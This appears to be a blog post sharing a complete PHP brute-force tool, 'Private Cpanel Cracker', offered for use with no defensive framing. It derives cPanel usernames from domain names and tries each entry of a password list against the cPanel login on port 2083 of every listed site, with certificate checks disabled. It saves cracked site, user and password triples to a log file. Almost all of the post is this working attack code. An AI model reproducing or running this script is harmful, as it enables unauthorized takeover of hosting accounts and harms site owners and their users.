This is a php script called Private Cpanel Cracker. It takes in a site list and a word list.
©2012, copyright BLACK BURN
Code:
<?php
set_time_limit(0);
class cracker
{
public $sitelist;
public $passlist;
public function calis()
{
$usernames = $this->make_username();
$sitelist = explode("\n",$this->openfile($this->sitelist));
$passlist = explode("\n",$this->openfile($this->passlist));
$increment = 0;
echo "\n\n[*]Site list -> $this->sitelist\n";
echo "[*]Pass list -> $this->passlist\n";
echo "[*]Total urls -> ".count($sitelist)."\n";
echo "[*]Total pass -> ".count($passlist)."\n";
echo "[*]Cracking started\n\n";
foreach($sitelist as $id => $site)
{
$increment++;
$site = trim($site);
echo "-------------------------------------------------------\n";
echo "[*]Trying site: ".$site." $increment / ".count($sitelist)."\n";
if(eregi('http',$site)){
$site = str_replace("http://","https://",$site);
}else{
$site = "https://$site";
}
$site= $site.":2083";
if(!$this->pass_site($site))
{
echo "[-]Not cpanel,passing site\n";
echo "-------------------------------------------------------\n\n";
continue;
}
echo "[*]Connected Cpanel [OK]\n";
echo "[*]Username: ".$usernames[$id]."\n";
echo "[*]Loaded ".count($passlist)." passwords\n";
echo "[*]Coded by Miyachung ||| Janissaries.Org\n";
foreach($passlist as $pass)
{
$cracked = false;
$pass=trim($pass);
$result = $this->post($site,$usernames[$id],$pass);
if(preg_match('/security_token/',$result))
{
$cracked = true;
echo "[+]$pass password cracked for $usernames[$id]\n";
echo "-------------------------------------------------------\n\n";
$this->savefile("$site|$usernames[$id]|$pass");
break;
}
}
if(!$cracked){echo "[-]Not found\n";echo "-------------------------------------------------------\n\n";}
}
}
private function make_username()
{
$op = explode("\n",$this->openfile($this->sitelist));
foreach($op as $site)
{
if(eregi('http://',$site)) $site = str_replace("http://","",$site);
if(!eregi('www',$site)) $site = "www.".$site;
$site = explode(".",$site);
$site = str_replace("-","",$site[1]);
$usernames[] = substr($site,0,8);
}
return $usernames;
}
public function lists()
{
echo "[!]Site list: ";
$sitelist = fgets(STDIN);
$sitelist = str_replace("\r\n","",$sitelist);
$sitelist = trim($sitelist);
echo "[!]Pass list: ";
$passlist = fgets(STDIN);
$passlist = str_replace("\r\n","",$passlist);
$passlist = trim($passlist);
return array($sitelist,$passlist);
}
private function post($site,$user,$pass)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl,CURLOPT_URL,$site."/login/?login_only=1");
curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl,CURLOPT_TIMEOUT,7);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,"user=$user&pass=$pass");
$exec = curl_exec($curl);
return $exec;
}
private function pass_site($site)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl,CURLOPT_URL,$site);
curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
curl_setopt($curl,CURLOPT_TIMEOUT,7);
$exec = curl_exec($curl);
$info = curl_getinfo($curl);
if($info['http_code'] != 0)
{
return true;
}
else
{
return false;
}
}
private function openfile($file)
{
$file = @file_get_contents($file);
if(!$file) exit("WTF File not found ?");
return $file;
}
private function savefile($content)
{
$file = fopen('crackerlog.txt','ab');
fwrite($file,$content."\r\n");
fclose($file);
return $file;
}
}
$class = new cracker();
$lists = $class->lists();
if(empty($lists[0]) || empty($lists[1])) exit("WTF Empty ? ");
$class->sitelist = $lists[0];
$class->passlist = $lists[1];
$class->calis();
?>
©2012, copyright BLACK BURN
0 comments:
Post a Comment